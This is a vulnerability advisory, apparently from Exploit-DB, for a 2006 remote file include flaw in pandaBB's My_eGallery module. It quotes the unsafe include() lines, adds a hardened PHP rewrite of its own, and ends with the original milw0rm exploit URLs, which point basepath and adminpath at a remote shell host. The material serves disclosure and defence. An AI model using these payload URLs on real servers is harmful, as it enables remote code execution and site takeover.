Vendor: pandaBB
By: nukedclx (nukedclx@gmail.com)
CVSS: 7.5 (HIGH)
CWE: 98 (Remote File Include)
Product Name: pandaBB
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

pandaBB (basepath;adminpath) Remote File Include

A remote file include vulnerability exists in pandaBB that allows an attacker to include a remote file containing malicious PHP code, resulting in arbitrary code execution. The cause is that the application passes the user-controllable variables $basepath and $adminpath to include() without validating them. An attacker can leverage this vulnerability to execute arbitrary PHP code in the context of the web server process.

Mitigation:

Input validation should be used to ensure that user supplied input is properly sanitized and is not used to include files from external sources.

Exploit-DB raw data:

   - - [DEVIL TEAM THE BEST POLISH TEAM] - -

pandaBB (basepath;adminpath) Remote File Include
Script name: pandaBB
Script site: http://phpnuke.pl
Find by: nukedclx (nukedclx@gmail.com)

DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
Contact:
- kacper1964@yahoo.pl
- http://www.rahim.webd.pl/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon & Kacper
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko., CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, SkD, MXZ, sysios, mIvus, wacky


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
in modules/My_eGallery/public/displayCategory.php

lines 1-3:
<?php
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");

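For contrast, a hardened version of the two include() calls above, written as an added example here; it is not pandaBB's code or the vendor's patch, and every directory name other than modules/My_eGallery/public is an assumption about the module layout:

```php
<?php
// Added example, not pandaBB's code or its vendor patch: the two include()
// calls from displayCategory.php rewritten so the paths cannot be set from
// the request. Directory names other than modules/My_eGallery/public are
// assumptions about the layout.

// The original read $basepath/$adminpath from the request (register_globals),
// so "?basepath=http://..." made include() fetch remote PHP. Here both paths
// are anchored to this file's own location and never touched by input.
$basepath  = realpath(dirname(__DIR__));        // modules/My_eGallery
$adminpath = realpath($basepath . '/admin');    // assumed admin directory

if ($basepath === false || $adminpath === false) {
    http_response_code(500);
    exit('module layout not found');
}

/**
 * Include $relative beneath $root only if it resolves to an existing file
 * inside $root. A "../" escape, or a URL scheme such as http:// or php://,
 * never resolves to a file under $root and is therefore rejected.
 */
function includeWithin(string $root, string $relative): void
{
    $resolved = realpath($root . '/' . $relative);
    $prefix   = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($resolved === false || strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        http_response_code(500);
        exit('include path rejected');
    }
    require $resolved;
}

includeWithin($basepath, 'public/imageFunctions.php');
includeWithin($adminpath, 'fileFunctions.php');

// Defence in depth, in php.ini: allow_url_include=Off and register_globals=Off,
// so include() cannot fetch URLs even if a path is ever derived from input again.
```

The check in includeWithin() is belt-and-braces: with the paths fixed at the top, request input can no longer reach include() at all, and the prefix check catches any future change that reintroduces it.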
%Exploit
        http://host/pandadir/modules/My_eGallery/public/displayCategory.php?adminpath=http://sh3ll
        http://host/pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://sh3ll

# milw0rm.com [2006-10-19]